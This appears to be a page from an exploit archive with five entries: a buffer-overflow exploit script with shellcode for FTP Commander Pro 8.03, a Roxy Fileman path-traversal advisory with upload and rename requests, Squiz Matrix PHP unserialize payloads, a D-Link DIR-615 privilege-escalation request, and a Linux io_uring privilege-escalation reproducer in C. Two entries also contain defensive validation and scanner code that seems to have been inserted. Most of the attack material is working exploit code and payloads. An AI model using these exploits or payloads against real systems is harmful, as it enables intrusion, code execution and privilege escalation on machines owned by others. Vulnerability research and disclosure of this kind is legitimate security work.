
FTP Commander Pro 8.03 Local Stack Overflow


FTP Commander Pro version 8.03 suffers from a local stack overflow vulnerability.


MD5 | 925505483680514fa64f204f5dad0883

# Exploit Title: FTP Commander Pro 8.03 - Local Stack Overflow 
# Date: 2019-12-12
# Exploit Author: boku
# Discovered by: UN_NON
# Original DoS: FTP Commander 8.02 - Overwrite (SEH)
# Original DoS Link: https://www.exploit-db.com/exploits/37810
# Software Vendor: http://www.internet-soft.com/
# Software Link: http://www.internet-soft.com/DEMO/cftpsetup.exe
# Version: Version 8.03 & Version 8.02 (same exploit for both)
# Tested on: Windows 10 Home 1909 (64-bit; OS-build=18363.418)
# Windows 10 Education 1909 (32-bit; OS-build=18363.418)
# Windows 10 Pro 1909 (32-bit; OS-build=18363.418)
# Windows Vista Home Basic SP1 (6.0.6001 Build 6001)
# Windows XP Professional (32-bit)- 5.1.2600 Service Pack 3 Build 2600
# Python Version: Python 2.7.16+

# Recreate:
# 1) Generate 'poc.txt' payload using python 2.7.x
# 2) On target Windows machine, open the file 'poc.txt' with notepad, then Select-All & Copy
# 3) Install & Open ftpCommander v8.03 (or v8.02)
# 4) Go to Menu Bar > FTP-Server Drop-down > click Custom Command
# - A textbox will appear on the bottom of the right window
# 5) Paste payload from generated txt file into textbox
# 6) Click "Do it"
# - The program will crash & calculator will open
# Other Security Issue:
# - The program's default install path is: C:\cftp\cftp.exe

#!/usr/bin/python

blt = '\033[92m[\033[0m+\033[92m]\033[0m ' # bash green success bullet
err = '\033[91m[\033[0m!\033[91m]\033[0m ' # bash red error bullet

File = 'poc.txt' # defined before the try block so the error message can name it

try:
    # EIP offset at 4108 -- if you exceed 4112 bytes you will overwrite nSEH & SEH
    nops = 'CGS[BOKU]J'*100 # 1000 nops that are ASCII friendly
    # EIP jump lands at the beginning of the buffer
    # Shellcode can be up to 4108 bytes by adjusting nops & replacing shellcode
    # msfvenom -p windows/exec CMD='calc' -b '\x00' --platform windows -v shellcode -a x86 -f python -e x86/alpha_upper
    # x86/alpha_upper succeeded with size 447 (iteration=0)
    shellcode = b""
    shellcode += b"\x89\xe7\xda\xd6\xd9\x77\xf4\x58\x50\x59\x49"
    shellcode += b"\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a"
    shellcode += b"\x56\x54\x58\x33\x30\x56\x58\x34\x41\x50\x30"
    shellcode += b"\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41"
    shellcode += b"\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42"
    shellcode += b"\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a"
    shellcode += b"\x49\x4b\x4c\x4a\x48\x4d\x52\x35\x50\x35\x50"
    shellcode += b"\x33\x30\x53\x50\x4c\x49\x4d\x35\x50\x31\x39"
    shellcode += b"\x50\x52\x44\x4c\x4b\x50\x50\x56\x50\x4c\x4b"
    shellcode += b"\x46\x32\x44\x4c\x4c\x4b\x31\x42\x42\x34\x4c"
    shellcode += b"\x4b\x42\x52\x46\x48\x34\x4f\x4f\x47\x51\x5a"
    shellcode += b"\x51\x36\x36\x51\x4b\x4f\x4e\x4c\x37\x4c\x33"
    shellcode += b"\x51\x33\x4c\x44\x42\x56\x4c\x57\x50\x4f\x31"
    shellcode += b"\x58\x4f\x54\x4d\x45\x51\x4f\x37\x5a\x42\x4b"
    shellcode += b"\x42\x36\x32\x30\x57\x4c\x4b\x51\x42\x34\x50"
    shellcode += b"\x4c\x4b\x50\x4a\x57\x4c\x4c\x4b\x30\x4c\x32"
    shellcode += b"\x31\x34\x38\x4b\x53\x57\x38\x43\x31\x4e\x31"
    shellcode += b"\x46\x31\x4c\x4b\x31\x49\x51\x30\x45\x51\x48"
    shellcode += b"\x53\x4c\x4b\x47\x39\x44\x58\x4b\x53\x37\x4a"
    shellcode += b"\x31\x59\x4c\x4b\x56\x54\x4c\x4b\x35\x51\x4e"
    shellcode += b"\x36\x50\x31\x4b\x4f\x4e\x4c\x39\x51\x38\x4f"
    shellcode += b"\x34\x4d\x45\x51\x59\x57\x30\x38\x4b\x50\x43"
    shellcode += b"\x45\x5a\x56\x55\x53\x33\x4d\x4a\x58\x57\x4b"
    shellcode += b"\x53\x4d\x31\x34\x54\x35\x4a\x44\x36\x38\x4c"
    shellcode += b"\x4b\x31\x48\x36\x44\x45\x51\x38\x53\x35\x36"
    shellcode += b"\x4c\x4b\x44\x4c\x30\x4b\x4c\x4b\x30\x58\x35"
    shellcode += b"\x4c\x53\x31\x49\x43\x4c\x4b\x44\x44\x4c\x4b"
    shellcode += b"\x55\x51\x38\x50\x4d\x59\x47\x34\x31\x34\x56"
    shellcode += b"\x44\x51\x4b\x51\x4b\x55\x31\x46\x39\x31\x4a"
    shellcode += b"\x30\x51\x4b\x4f\x4d\x30\x31\x4f\x31\x4f\x50"
    shellcode += b"\x5a\x4c\x4b\x42\x32\x4a\x4b\x4c\x4d\x31\x4d"
    shellcode += b"\x53\x5a\x33\x31\x4c\x4d\x4b\x35\x48\x32\x33"
    shellcode += b"\x30\x55\x50\x33\x30\x56\x30\x32\x48\x30\x31"
    shellcode += b"\x4c\x4b\x42\x4f\x4d\x57\x4b\x4f\x38\x55\x4f"
    shellcode += b"\x4b\x4c\x30\x4f\x45\x59\x32\x56\x36\x55\x38"
    shellcode += b"\x59\x36\x5a\x35\x4f\x4d\x4d\x4d\x4b\x4f\x59"
    shellcode += b"\x45\x37\x4c\x54\x46\x43\x4c\x54\x4a\x4d\x50"
    shellcode += b"\x4b\x4b\x4b\x50\x34\x35\x33\x35\x4f\x4b\x51"
    shellcode += b"\x57\x32\x33\x53\x42\x52\x4f\x42\x4a\x35\x50"
    shellcode += b"\x50\x53\x4b\x4f\x39\x45\x42\x43\x53\x51\x42"
    shellcode += b"\x4c\x32\x43\x53\x30\x41\x41"
    # Fill the rest of the space with B's until we are at our EIP offset
    offset = '\x42'*(4108-len(nops+shellcode))
    # The EAX register holds a Pointer to the beginning of our buffer
    # FF20 = jmp [eax]
    # !mona find -o -s '\xFF\x20'
    # 0x0041081a : '\xFF\x20' | startnull,ascii {PAGE_EXECUTE_READ} [ftpcomm.exe]
    # | ASLR: False; Rebase: False; SafeSEH: False;
    eip = '\x1a\x08\x41' # 3 byte overwrite so we can set EIP to start with 0x00
    # After jmp [eax], we land at the beginning of our buffer
    payload = nops+shellcode+offset+eip
    f = open(File, 'w') # open file for write
    f.write(payload)
    f.close() # close the file
    print(blt + File + " created successfully ")

except:
    print(err + File + ' failed to create')


Roxy Fileman 1.4.5 For .NET Directory Traversal


Roxy Fileman version 1.4.5 for .NET suffers from a directory traversal vulnerability.


MD5 | 8284d1688030466bc863d4e452dcf4ff


===========================
Exploit Title: Roxy Fileman 1.4.5 for .NET - Directory Traversal
Software: Roxy Fileman
Version: 1.4.5
Vendor Homepage: http://www.roxyfileman.com/
Software Link: http://www.roxyfileman.com/download.php?f=1.4.5-net
CVE number: CVE-2019-19731
Found: 2019-12-06
Tested on: ASP.NET 4.0.30319 and Microsoft-IIS 10.0, Windows 10 Pro Build 17134
(using custom account as application pool identity for the IIS worker process).
Author: Patrik Lantz

===========================
Description
===========================
Roxy Fileman 1.4.5 for .NET is vulnerable to path traversal, which can lead to file writes in arbitrary locations depending on
the IIS worker process privileges.
This PoC demonstrates a crafted Windows shortcut file being uploaded and written to the Startup folder. Execution
of this file is triggered on the next login.


Proof of Concept
===========================

It is possible to write an uploaded file to arbitrary locations using the RENAMEFILE action.
The RenameFile function in main.ashx does not check whether the new file name 'name' is a valid location.
Moreover, the default conf.json has an incomplete blacklist for file extensions, which in this case
allows Windows shortcut files to be uploaded; alternatively, existing files can be renamed to include
the .lnk extension.

1) Create a shortcut file

For example, one pointing at the target executable C:\Windows\System32\Calc.exe.
Remove the .lnk extension and rename it to use the .dat extension.


2) Upload the file

Either upload the .dat file manually via the Roxy Fileman web interface
or programmatically using an HTTP POST request.

Details of the request:

POST /wwwroot/fileman/asp_net/main.ashx?a=UPLOAD HTTP/1.1
Host: 127.0.0.1:50357
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------159382831523528
Content-Length: 924
Origin: http://127.0.0.1:50357
Connection: close
Referer: http://127.0.0.1:50357/wwwroot/fileman/
Cookie: roxyld=%2Fwwwroot%2Ffileman%2FUploads%2Ftest2; roxyview=list

-----------------------------159382831523528
Content-Disposition: form-data; name="action"

upload
-----------------------------159382831523528
Content-Disposition: form-data; name="method"

ajax
-----------------------------159382831523528
Content-Disposition: form-data; name="d"

/wwwroot/fileman/Uploads/test2
-----------------------------159382831523528
Content-Disposition: form-data; name="files[]"; filename="poc.dat"
Content-Type: application/octet-stream

...data omitted...
-----------------------------159382831523528--



3) Write the file to the Startup folder using the RENAMEFILE action
The new filename is set via the n parameter. The correct path can be identified by trial and error, depending
on the location of wwwroot on the filesystem and the privileges of the IIS worker process (w3wp.exe).

If the necessary directories do not exist, they can be created using the CREATEDIR action, which is also
vulnerable to path traversal.


POST /wwwroot/fileman/asp_net/main.ashx?a=RENAMEFILE&f=%2Fwwwroot%2Ffileman%2FUploads%2FDocuments%2Fpoc.dat&n=../../../../../../../../AppData/Roaming/Microsoft/Windows/Start%20Menu/Programs/Startup/poc.txt.lnk HTTP/1.1
Host: 127.0.0.1:50357
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 66
Origin: http://127.0.0.1:50357
Connection: close
Referer: http://127.0.0.1:50357/wwwroot/fileman/
Cookie: roxyld=%2Fwwwroot%2Ffileman%2FUploads%2Ftest2; roxyview=list

f=%2Fwwwroot%2Ffileman%2FUploads%2Ftest2%2Fpoc.dat&n=poc.dat



Workaround / Fix:
===========================

Patch the main.ashx code so that every path used by the following actions is validated before it is used:
CREATEDIR, COPYFILE and RENAMEFILE.

Recommendations for users of Roxy Fileman:
- Add the lnk file extension to FORBIDDEN_UPLOADS in conf.json, and also aspx, since it is not included in the blacklist by default.
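The checks the fix above calls for, written here as an added Python example rather than Roxy Fileman's own C# (this is not project code): every client-supplied path is resolved against the upload root, the RENAMEFILE new name must be a bare filename, and the resulting extension is tested against a blacklist that includes .lnk and .aspx. The upload root path and the `validate_rename` / `resolve_inside` names are assumptions for the example.

```python
# Added example (not Roxy Fileman code): the server-side checks the
# advisory's fix section asks for, modelled on a RENAMEFILE request.
import os
from typing import Optional, Tuple

# The two extensions the advisory says are missing from the default
# FORBIDDEN_UPLOADS list; a real deployment extends this set.
FORBIDDEN_EXTENSIONS = {"lnk", "aspx"}


def _within(root_abs: str, candidate: str) -> bool:
    """True if the resolved absolute path 'candidate' lies under root_abs."""
    try:
        return os.path.commonpath([root_abs, candidate]) == root_abs
    except ValueError:      # different drives on Windows
        return False


def resolve_inside(root: str, client_rel: str) -> Optional[str]:
    """Resolve a client-supplied path relative to the upload root.

    Returns the absolute path, or None when '..' segments would take it
    outside root.  Both separators are accepted because the target is IIS
    on Windows; a leading separator is stripped so the value stays relative."""
    root_abs = os.path.realpath(root)
    rel = client_rel.replace("\\", "/").lstrip("/")
    candidate = os.path.realpath(os.path.join(root_abs, rel))
    return candidate if _within(root_abs, candidate) else None


def forbidden_extension(name: str) -> Optional[str]:
    """Return the blacklisted extension of 'name' (lower-cased), else None.

    Windows drops trailing dots and spaces from a final path component, so
    'shell.aspx.' must be judged as 'shell.aspx'."""
    effective = name.rstrip(". ")
    if "." not in effective:
        return None
    ext = effective.rsplit(".", 1)[1].lower()
    return ext if ext in FORBIDDEN_EXTENSIONS else None


def validate_rename(root: str, src_rel: str, new_name: str) -> Tuple[bool, str]:
    """Check one rename request: 'f' = src_rel, 'n' = new_name.

    Returns (allowed, reason_or_destination); nothing is touched on disk."""
    src = resolve_inside(root, src_rel)
    if src is None:
        return False, "source path escapes the upload root"
    # A rename only changes the final component.  Any separator or dot-segment
    # means the client is trying to turn it into a move, which is exactly the
    # traversal used in the advisory.
    effective = new_name.replace("\\", "/").rstrip(". ")
    if not effective or effective in (".", "..") or "/" in effective:
        return False, "new name must be a bare filename"
    ext = forbidden_extension(effective)
    if ext is not None:
        return False, "extension .%s is forbidden" % ext
    dst = os.path.realpath(os.path.join(os.path.dirname(src), effective))
    if not _within(os.path.realpath(root), dst):
        return False, "destination escapes the upload root"
    return True, dst


# Constructed upload root for the example; nothing is created on disk.
UPLOAD_ROOT = "/srv/wwwroot/fileman/Uploads"

if __name__ == "__main__":
    for n in ("poc2.dat", "poc.txt.lnk", "shell.ASPX.",
              "../../../../AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/poc.txt.lnk"):
        print(n, "->", validate_rename(UPLOAD_ROOT, "test2/poc.dat", n))
```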



Timeline
===========================
2019-12-06: Discovered the vulnerability
2019-12-06: Reported to the vendor (vendor is unresponsive)
2019-12-11: Request CVE
2019-12-13: Advisory published

Discovered By:
===========================
Patrik Lantz


Squiz Matrix CMS 5.5.x.x Code Execution / Information Disclosure


Squiz Matrix CMS suffers from PHP unserialization code execution, information disclosure, and arbitrary file deletion vulnerabilities.


MD5 | 2a89eaa5d695460978b8a6a34c1d28bb

Introduction
============
ZX Security identified several vulnerabilities in the Squiz Matrix CMS that
can be chained together to gain pre-authenticated remote code execution in
some circumstances.

Affected Versions
=================
The issues in this advisory affect the following versions of Squiz Matrix:
* 5.5.0 prior to 5.5.0.3
* 5.5.1 prior to 5.5.1.8
* 5.5.2 prior to 5.5.2.4
* 5.5.3 prior to 5.5.3.3

Technical Findings
==================

PHP unserialization of user input may result in remote code execution
---------------------------------------------------------------------
CVE-2019-19373

When an instance of a Remote Content page exists within a Squiz Matrix CMS
website, user input is passed directly and unsanitized to the PHP function
unserialize. In some versions of PHP (e.g. before 5.4.24), this can be
leveraged into an LFI issue. If combined with arbitrary file upload to the
Squiz Matrix CMS website, this leads to remote code execution.

Within
packages/cms/page_templates/page_remote_content/page_remote_content.inc,
the POST parameter
“page_remote_content_[pageid]_sq_remote_input_file_names” is passed to
unserialize. No generic unserialization gadgets were identified within the
default installation, so the autoloader can be attacked instead.

There are multiple autoloaders that are enabled during the standard Squiz
Matrix execution path. Of note is one found in
vendor/simplesamlphp/saml2/src/_autoload.php. When given a class name that
contains characters such as "." and "/", it will directly use these to
include a file. This is a local file inclusion issue within the code,
though it is codified within PSR standards and not normally exploitable. Note,
however, that underscores are not valid within a filename included by this
method.

Using this class, we can potentially include a file simply by having PHP
attempt to instantiate a class with a malicious name.

There is a second autoloader within the codebase that is not run by
default: vendor/gettext/languages/src/autoloader.php. This autoloader
contains the same kind of issue, however without the underscore limitation
(though with other limitations, such as the class beginning with a certain
string). Once again, this is part of the PSR specification, and not
normally exploitable.

PHP includes within its unserialize function a check on the class name of a
deserialized object to ensure it does not contain invalid characters. This
means we cannot directly trigger the LFI issue using deserialize.

Instead, we can use a more standard deserialize exploitation example, where
we instantiate a class that calls specific code on __destruct. Through
reviewing the codebase, multiple places were found that are applicable to
this case.

Consider:
vendor/simplesamlphp/simplesamlphp/lib/SimpleSAML/Store/Redis.php. The
destruct method of this class calls the `method_exists` function on the
`$this->redis` variable, which we can control. The `method_exists`
function, among many others, will trigger the autoloader with the first
variable specified (in this case, `$this->redis`, which we control). It
should be noted once again that this is not the same on all versions of PHP
(see references at the end of this advisory).

The last part of exploitation is a deserialize technique called "fast
destruct". This allows an object to be destructed within a single
deserialize call, which allows us to instantiate two classes that trigger
the LFI exploit sequentially within a single request.

Putting together these steps, we can generate an unserialize payload like
this:

$r = new SimpleSAML\Store\Redis('../../../../vendor/gettext/languages/src/autoloader');
$r2 = new SimpleSAML\Store\Redis('Gettext\Languages\../../../../x.php'); // File to include
echo serialize(array($r, $r2));

This gives a payload such as:

a:2:{i:0;O:22:"SimpleSAML\Store\Redis":1:{s:5:"redis";s:51:"../../../../vendor/gettext/languages/src/autoloader";}i:1;O:22:"SimpleSAML\Store\Redis":1:{s:5:"redis";s:220:"Gettext\Languages\../../../../data/private/assets/form_email/0008/38978/incomplete_attachments/e7b54mbvmmkfuip5tnogfter9k4ddndf81caoso02ceknl1m5ikmt1ijnn9u9bnaj861iv3tgar1e3od3bi4l13uctm1l5uotiubrf2/38978_q1/simple_shell";}}

If we modify this with the fast destruct method, we get the payload:

a:2:{i:0;O:22:"SimpleSAML\Store\Redis":1:{s:5:"redis";s:51:"../../../../vendor/gettext/languages/src/autoloader";}i:0;O:22:"SimpleSAML\Store\Redis":1:{s:5:"redis";s:220:"Gettext\Languages\../../../../data/private/assets/form_email/0008/38978/incomplete_attachments/e7b54mbvmmkfuip5tnogfter9k4ddndf81caoso02ceknl1m5ikmt1ijnn9u9bnaj861iv3tgar1e3od3bi4l13uctm1l5uotiubrf2/38978_q1/simple_shell";}}

Once we send this request to the server on a Remote Page type, we achieve
LFI of a file we previously uploaded to the server, resulting in remote
code execution.
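A defender-side counterpart to the payloads above, added here and not part of the ZX Security advisory or of Squiz Matrix: a small parser for PHP serialize() output that reports which classes unserialize() would instantiate and whether an array repeats a key, the shape the fast-destruct variant relies on. The sample payload is constructed with placeholder paths; in PHP itself, `unserialize($data, ['allowed_classes' => false])` (PHP 7.0+) refuses object instantiation outright.

```python
from typing import Any, Dict, List


class PhpSerializedScanner:
    """Recursive parser for ASCII serialize() output (declared lengths are
    bytes in PHP; this example assumes ASCII, so chars == bytes)."""

    def __init__(self, data: str) -> None:
        self.data = data
        self.pos = 0
        self.classes: List[str] = []   # every class an O: token would instantiate
        self.duplicate_keys = 0        # keys repeated inside one array/object

    def scan(self) -> Any:
        value = self._value()
        if self.pos != len(self.data):
            raise ValueError("trailing data after serialized value")
        return value

    def _expect(self, ch: str) -> None:
        if self.pos >= len(self.data) or self.data[self.pos] != ch:
            raise ValueError("expected %r at offset %d" % (ch, self.pos))
        self.pos += 1

    def _read_until(self, ch: str) -> str:
        end = self.data.index(ch, self.pos)        # ValueError if ch is missing
        token = self.data[self.pos:end]
        self.pos = end + 1
        return token

    def _read_quoted(self, length: int) -> str:
        self._expect('"')
        text = self.data[self.pos:self.pos + length]
        if len(text) != length:
            raise ValueError("string shorter than its declared length")
        self.pos += length
        self._expect('"')
        return text

    def _value(self) -> Any:
        tag = self.data[self.pos]                  # IndexError on truncated input
        self.pos += 1
        if tag == "N":                             # N;
            self._expect(";")
            return None
        self._expect(":")
        if tag == "i":                             # i:0;
            return int(self._read_until(";"))
        if tag == "b":                             # b:1;
            return self._read_until(";") == "1"
        if tag == "d":                             # d:1.5;
            return float(self._read_until(";"))
        if tag == "s":                             # s:5:"redis";
            text = self._read_quoted(int(self._read_until(":")))
            self._expect(";")
            return text
        if tag == "a":                             # a:2:{key;value;...}
            return self._members(int(self._read_until(":")))
        if tag == "O":                             # O:22:"Class":1:{props}
            name = self._read_quoted(int(self._read_until(":")))
            self._expect(":")
            count = int(self._read_until(":"))
            self.classes.append(name)
            return {"__class__": name, "props": self._members(count)}
        raise ValueError("unsupported tag %r at offset %d" % (tag, self.pos - 1))

    def _members(self, count: int) -> Dict[Any, Any]:
        self._expect("{")
        members: Dict[Any, Any] = {}
        for _ in range(count):
            key = self._value()
            if key in members:           # i:0 ... i:0 is the fast-destruct shape
                self.duplicate_keys += 1
            members[key] = self._value()
        self._expect("}")
        return members


def inspect_payload(data: str) -> Dict[str, Any]:
    """Summarise one serialize() string.  'reject' is True when unserialize()
    would instantiate an object, when a key repeats, or when input is malformed."""
    scanner = PhpSerializedScanner(data)
    try:
        scanner.scan()
        malformed = False
    except (ValueError, IndexError, TypeError):
        malformed = True
    return {"classes": scanner.classes,
            "duplicate_keys": scanner.duplicate_keys,
            "malformed": malformed,
            "reject": malformed or bool(scanner.classes) or scanner.duplicate_keys > 0}


# Constructed sample in the shape of the advisory's fast-destruct payload: both
# array entries carry index 0; the two paths are placeholders, not real targets.
FAST_DESTRUCT_SAMPLE = (
    r'a:2:{i:0;O:22:"SimpleSAML\Store\Redis":1:{s:5:"redis";s:13:"../../x/y/z.p";}'
    r'i:0;O:22:"SimpleSAML\Store\Redis":1:{s:5:"redis";s:7:"Foo\Bar";}}'
)
BENIGN_SAMPLE = 'a:1:{s:4:"name";s:5:"alice";}'   # constructed: a plain array
```

Run `inspect_payload()` on the request body before it reaches `unserialize()`; any non-empty `classes` list on an endpoint that expects plain arrays is grounds to reject the request.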

Arbitrary file deletion and information disclosure in file upload form
----------------------------------------------------------------------
CVE-2019-19374

When an instance of a custom form with a File Upload Field exists within a
Squiz Matrix CMS website, users of the website may be able to delete
arbitrary files from the server through the delete uploaded file feature.
Additionally, this feature discloses the full path of files uploaded to the
server, a form of information disclosure.

When a user uploads a file to a form, they can keep track of the files with
the "prev_files" array, which is rendered in the HTML after a file is
uploaded. This array contains the full path to each uploaded file. The
relevant code can be found in:

core/assets/form/form_question_types/form_question_type_file_upload/form_question_type_file_upload.inc

An attacker can replace this path to one of their choosing, such as setting
it to "data/private/conf/db.inc", and choose the delete file option. This
deletes the file from the server.

Disclosure Timeline
===================

ZX Security would like to commend the prompt response and resolution of
these reported issues by the vendor.

Vendor notification: August 09, 2019
Vendor response: August 09, 2019
Fixed versions released: August 29, 2019

References
==========

For more information on the PHP unserialize fast destruct technique, see:
https://github.com/ambionics/phpggc.
For more information on exploiting the PHP autoloader, including
information on exactly which PHP versions are affected, see:
https://medium.com/@ss23/php-autloading-local-file-inclusion-by-design-71aafe627877



D-Link DIR-615 Privilege Escalation


D-Link DIR-615 suffers from a privilege escalation vulnerability.


MD5 | 493e75de8e7ec25a2de010cb3530fb22

# Exploit Title: D-Link DIR-615 - Privilege Escalation
# Date: 2019-12-10
# Exploit Author: Sanyam Chawla
# Vendor Homepage: http://www.dlink.co.in
# Category: Hardware (Wi-fi Router)
# Hardware Link: http://www.dlink.co.in/products/?pid=678
# Hardware Version: T1
# Firmware Version: 20.07
# Tested on: Windows 10 and Kali linux
# CVE: N/A

# Reproduction Steps:
# Log in to your Wi-Fi router gateway with normal user credentials (e.g. http://192.168.0.1).
# Go to the Maintenance page and click on Admin in the left panel.
# There is an option to create a user; by default, it only shows user accounts.
# Create an account with a name (e.g. ptguy) and change the privileges from user to root (admin)
# by changing the privilege id (1 to 2) with Burp Suite.

# Privilege Escalation Post Request

POST /form2userconfig.cgi HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 122
Origin: http://192.168.0.1
Connection: close
Referer: http://192.168.0.1/userconfig.htm
Cookie: SessionID=
Upgrade-Insecure-Requests: 1

username=ptguy&privilege=2&newpass=pentesting&confpass=pentesting&adduser=Add&hiddenpass=&submit.htm%3Fuserconfig.htm=Send

# Now log in with the newly created root user (ptguy). You have all administrator rights.

Linux sendmsg() Privilege Escalation


Linux suffers from a privilege escalation vulnerability via io_uring offload of sendmsg() onto kernel thread with kernel creds.


MD5 | 7594e7ead982b1ba2cb61b42fa00ac35

Linux: privilege escalation via io_uring offload of sendmsg() onto kernel thread with kernel creds

Since commit 0fa03c624d8f ("io_uring: add support for sendmsg()", first in v5.3),
io_uring has support for asynchronously calling sendmsg().
Unprivileged userspace tasks can submit IORING_OP_SENDMSG submission queue
entries, which cause sendmsg() to be called either in syscall context in the
original task, or - if that wasn't able to send a message without blocking - on
a kernel worker thread.

The problem is that sendmsg() can end up looking at the credentials of the
calling task for various reasons; for example:

- sendmsg() with non-null, non-abstract ->msg_name on an unconnected AF_UNIX
datagram socket ends up performing filesystem access checks
- sendmsg() with SCM_CREDENTIALS on an AF_UNIX socket ends up looking at
process credentials
- sendmsg() with non-null ->msg_name on an AF_NETLINK socket ends up performing
capability checks against the calling process

When the request has been handed off to a kernel worker task, all such checks
are performed against the credentials of the worker - which are default kernel
creds, with UID 0 and full capabilities.

To force io_uring to hand off a request to a kernel worker thread, an attacker
can abuse the fact that the opcode field of the SQE is read multiple times, with
accesses to the struct msghdr in between: The attacker can first submit an SQE
of type IORING_OP_RECVMSG whose struct msghdr is in a userfaultfd region, and
then, when the userfaultfd triggers, switch the type to IORING_OP_SENDMSG.

Here's a reproducer for Linux 5.3 that demonstrates the issue by adding an
IPv4 address to the loopback interface without having the required privileges
for that:

==========================================================================
$ cat uring_sendmsg.c
#define _GNU_SOURCE
#include <pthread.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h> /* strerror() */
#include <err.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <sys/ioctl.h>
#include <linux/rtnetlink.h>
#include <linux/if_addr.h>
#include <linux/io_uring.h>
#include <linux/userfaultfd.h>
#include <linux/netlink.h>

#define SYSCHK(x) ({          \
  typeof(x) __res = (x);      \
  if (__res == (typeof(x))-1) \
    err(1, "SYSCHK(" #x ")"); \
  __res;                      \
})

static int uffd = -1;
static struct iovec *iov;
static struct iovec real_iov;
static struct io_uring_sqe *sqes;

static void *uffd_thread(void *dummy) {
  struct uffd_msg msg;
  int res = SYSCHK(read(uffd, &msg, sizeof(msg)));
  if (res != sizeof(msg)) errx(1, "uffd read");
  printf("got userfaultfd message\n");

  sqes[0].opcode = IORING_OP_SENDMSG;

  union {
    struct iovec iov;
    char pad[0x1000];
  } vec = {
    .iov = real_iov
  };
  struct uffdio_copy copy = {
    .dst = (unsigned long)iov,
    .src = (unsigned long)&vec,
    .len = 0x1000
  };
  SYSCHK(ioctl(uffd, UFFDIO_COPY, &copy));
  return NULL;
}

int main(void) {
  // initialize uring
  struct io_uring_params params = { };
  int uring_fd = SYSCHK(syscall(SYS_io_uring_setup, /*entries=*/10, &params));
  unsigned char *sq_ring = SYSCHK(mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_SHARED, uring_fd, IORING_OFF_SQ_RING));
  unsigned char *cq_ring = SYSCHK(mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_SHARED, uring_fd, IORING_OFF_CQ_RING));
  sqes = SYSCHK(mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_SHARED, uring_fd, IORING_OFF_SQES));

  // prepare userfaultfd-trapped IO vector page
  iov = SYSCHK(mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0));
  uffd = SYSCHK(syscall(SYS_userfaultfd, 0));
  struct uffdio_api api = { .api = UFFD_API, .features = 0 };
  SYSCHK(ioctl(uffd, UFFDIO_API, &api));
  struct uffdio_register reg = {
    .mode = UFFDIO_REGISTER_MODE_MISSING,
    .range = { .start = (unsigned long)iov, .len = 0x1000 }
  };
  SYSCHK(ioctl(uffd, UFFDIO_REGISTER, &reg));
  pthread_t thread;
  if (pthread_create(&thread, NULL, uffd_thread, NULL))
    errx(1, "pthread_create");

  // construct netlink message
  int sock = SYSCHK(socket(AF_NETLINK, SOCK_DGRAM, NETLINK_ROUTE));
  struct sockaddr_nl addr = {
    .nl_family = AF_NETLINK
  };
  struct {
    struct nlmsghdr hdr;
    struct ifaddrmsg body;
    struct rtattr opthdr;
    unsigned char addr[4];
  } __attribute__((packed)) msgbuf = {
    .hdr = {
      .nlmsg_len = sizeof(msgbuf),
      .nlmsg_type = RTM_NEWADDR,
      .nlmsg_flags = NLM_F_REQUEST
    },
    .body = {
      .ifa_family = AF_INET,
      .ifa_prefixlen = 32,
      .ifa_flags = IFA_F_PERMANENT,
      .ifa_scope = 0,
      .ifa_index = 1
    },
    .opthdr = {
      .rta_len = sizeof(struct rtattr) + 4,
      .rta_type = IFA_LOCAL
    },
    .addr = { 1, 2, 3, 4 }
  };
  real_iov.iov_base = &msgbuf;
  real_iov.iov_len = sizeof(msgbuf);
  struct msghdr msg = {
    .msg_name = &addr,
    .msg_namelen = sizeof(addr),
    .msg_iov = iov,
    .msg_iovlen = 1,
  };

  // send netlink message via uring
  sqes[0] = (struct io_uring_sqe) {
    .opcode = IORING_OP_RECVMSG,
    .fd = sock,
    .addr = (unsigned long)&msg
  };
  ((int*)(sq_ring + params.sq_off.array))[0] = 0;
  (*(int*)(sq_ring + params.sq_off.tail))++;
  int submitted = SYSCHK(syscall(SYS_io_uring_enter, uring_fd, /*to_submit=*/1, /*min_complete=*/1, /*flags=*/IORING_ENTER_GETEVENTS, /*sig=*/NULL, /*sigsz=*/0));
  printf("submitted %d, getevents done\n", submitted);
  int cq_tail = *(int*)(cq_ring + params.cq_off.tail);
  printf("cq_tail = %d\n", cq_tail);
  if (cq_tail != 1) errx(1, "expected cq_tail==1");
  struct io_uring_cqe *cqe = (void*)(cq_ring + params.cq_off.cqes);
  if (cqe->res < 0) {
    printf("result: %d (%s)\n", cqe->res, strerror(-cqe->res));
  } else {
    printf("result: %d\n", cqe->res);
  }
}
$ gcc -Wall -pthread -o uring_sendmsg uring_sendmsg.c
$ ip addr show dev lo
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
$ ./uring_sendmsg
got userfaultfd message
submitted 1, getevents done
cq_tail = 1
result: 32
$ ip addr show dev lo
